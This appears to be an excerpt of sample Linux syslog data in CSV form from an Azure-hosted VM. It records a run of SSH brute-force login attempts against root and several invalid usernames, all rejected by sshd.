+9551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:18,UbuntuDevEnv,2019-06-25 22:41:18,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 6182: Too many authentication failures [preauth],48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,6182,,
+9552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:18,UbuntuDevEnv,2019-06-25 22:41:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48213,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:24,UbuntuDevEnv,2019-06-25 22:41:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:26,UbuntuDevEnv,2019-06-25 22:41:26,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20043 ssh2,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20043,,
+9555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:27,UbuntuDevEnv,2019-06-25 22:41:27,auth,UbuntuDevEnv,info,Invalid user cristina from 77.232.128.87 port 34765,48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cristina,77.232.128.8,34765,,
+9556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:27,UbuntuDevEnv,2019-06-25 22:41:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:27,UbuntuDevEnv,2019-06-25 22:41:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:29,UbuntuDevEnv,2019-06-25 22:41:28,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20043 ssh2,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20043,,
+9559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:29,UbuntuDevEnv,2019-06-25 22:41:29,auth,UbuntuDevEnv,info,Failed password for invalid user cristina from 77.232.128.87 port 34765 ssh2,48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cristina,77.232.128.8,34765,,
+9560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:29,UbuntuDevEnv,2019-06-25 22:41:29,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 34765:11: Bye Bye [preauth],48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,34765,,
+9561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:29,UbuntuDevEnv,2019-06-25 22:41:29,auth,UbuntuDevEnv,info,Disconnected from invalid user cristina 77.232.128.87 port 34765 [preauth],48323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cristina,77.232.128.8,34765,,
+9562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:31,UbuntuDevEnv,2019-06-25 22:41:31,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20043 ssh2,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20043,,
+9563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:41,UbuntuDevEnv,2019-06-25 22:41:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:41,UbuntuDevEnv,2019-06-25 22:41:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 20043: Too many authentication failures [preauth],48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,20043,,
+9565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:41,UbuntuDevEnv,2019-06-25 22:41:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:41,UbuntuDevEnv,2019-06-25 22:41:41,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 20043 ssh2],48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20043,,
+9567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:41,UbuntuDevEnv,2019-06-25 22:41:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 20043 ssh2 [preauth],48302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20043,,
+9568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:48,UbuntuDevEnv,2019-06-25 22:41:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:41:50,UbuntuDevEnv,2019-06-25 22:41:50,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34000 ssh2,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34000,,
+9570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:01,UbuntuDevEnv,2019-06-25 22:41:59,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 34000 ssh2],48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34000,,
+9571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:02,UbuntuDevEnv,2019-06-25 22:42:02,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34000 ssh2,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34000,,
+9572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:05,UbuntuDevEnv,2019-06-25 22:42:04,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 34000: Too many authentication failures [preauth],48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,34000,,
+9573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:05,UbuntuDevEnv,2019-06-25 22:42:04,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:05,UbuntuDevEnv,2019-06-25 22:42:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34000 ssh2,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34000,,
+9575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:05,UbuntuDevEnv,2019-06-25 22:42:04,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 34000 ssh2 [preauth],48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34000,,
+9576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:05,UbuntuDevEnv,2019-06-25 22:42:04,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:08,UbuntuDevEnv,2019-06-25 22:42:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:10,UbuntuDevEnv,2019-06-25 22:42:09,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 47144 ssh2,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47144,,
+9579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:13,UbuntuDevEnv,2019-06-25 22:42:12,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 47144 ssh2,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47144,,
+9580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:15,UbuntuDevEnv,2019-06-25 22:42:15,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 47144 ssh2,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47144,,
+9581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:23,UbuntuDevEnv,2019-06-25 22:42:23,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 47144: Too many authentication failures [preauth],48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,47144,,
+9582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:23,UbuntuDevEnv,2019-06-25 22:42:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 47144 ssh2 [preauth],48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47144,,
+9583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:23,UbuntuDevEnv,2019-06-25 22:42:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:23,UbuntuDevEnv,2019-06-25 22:42:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:23,UbuntuDevEnv,2019-06-25 22:42:23,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 47144 ssh2],48472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47144,,
+9586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:26,UbuntuDevEnv,2019-06-25 22:42:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:28,UbuntuDevEnv,2019-06-25 22:42:27,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:28,UbuntuDevEnv,2019-06-25 22:42:27,auth,UbuntuDevEnv,info,Invalid user dong from 178.62.54.79 port 54898,48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,178.62.54.7,54898,,
+9589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:28,UbuntuDevEnv,2019-06-25 22:42:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:28,UbuntuDevEnv,2019-06-25 22:42:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:30,UbuntuDevEnv,2019-06-25 22:42:29,auth,UbuntuDevEnv,info,Failed password for invalid user dong from 178.62.54.79 port 54898 ssh2,48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,178.62.54.7,54898,,
+9592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:30,UbuntuDevEnv,2019-06-25 22:42:29,auth,UbuntuDevEnv,info,Disconnected from invalid user dong 178.62.54.79 port 54898 [preauth],48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,178.62.54.7,54898,,
+9593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:30,UbuntuDevEnv,2019-06-25 22:42:29,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 54898:11: Bye Bye [preauth],48550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,54898,,
+9594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:30,UbuntuDevEnv,2019-06-25 22:42:30,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:35,UbuntuDevEnv,2019-06-25 22:42:34,auth,UbuntuDevEnv,info,Invalid user sanjeev from 139.199.113.140 port 40868,48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,139.199.113.1,40868,,
+9596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:35,UbuntuDevEnv,2019-06-25 22:42:33,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:35,UbuntuDevEnv,2019-06-25 22:42:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:35,UbuntuDevEnv,2019-06-25 22:42:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:36,UbuntuDevEnv,2019-06-25 22:42:36,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:37,UbuntuDevEnv,2019-06-25 22:42:36,auth,UbuntuDevEnv,info,Failed password for invalid user sanjeev from 139.199.113.140 port 40868 ssh2,48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,139.199.113.1,40868,,
+9601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:37,UbuntuDevEnv,2019-06-25 22:42:36,auth,UbuntuDevEnv,info,Disconnected from invalid user sanjeev 139.199.113.140 port 40868 [preauth],48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,139.199.113.1,40868,,
+9602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:37,UbuntuDevEnv,2019-06-25 22:42:36,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 40868:11: Bye Bye [preauth],48574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,40868,,
+9603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:39,UbuntuDevEnv,2019-06-25 22:42:38,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:41,UbuntuDevEnv,2019-06-25 22:42:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 59038 ssh2 [preauth],48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:41,UbuntuDevEnv,2019-06-25 22:42:41,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59038 ssh2,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59038,,
+9606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:41,UbuntuDevEnv,2019-06-25 22:42:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 59038: Too many authentication failures [preauth],48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,59038,,
+9607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:41,UbuntuDevEnv,2019-06-25 22:42:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:41,UbuntuDevEnv,2019-06-25 22:42:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:44,UbuntuDevEnv,2019-06-25 22:42:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179  user=test,48603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,152.250.252.1,,0,
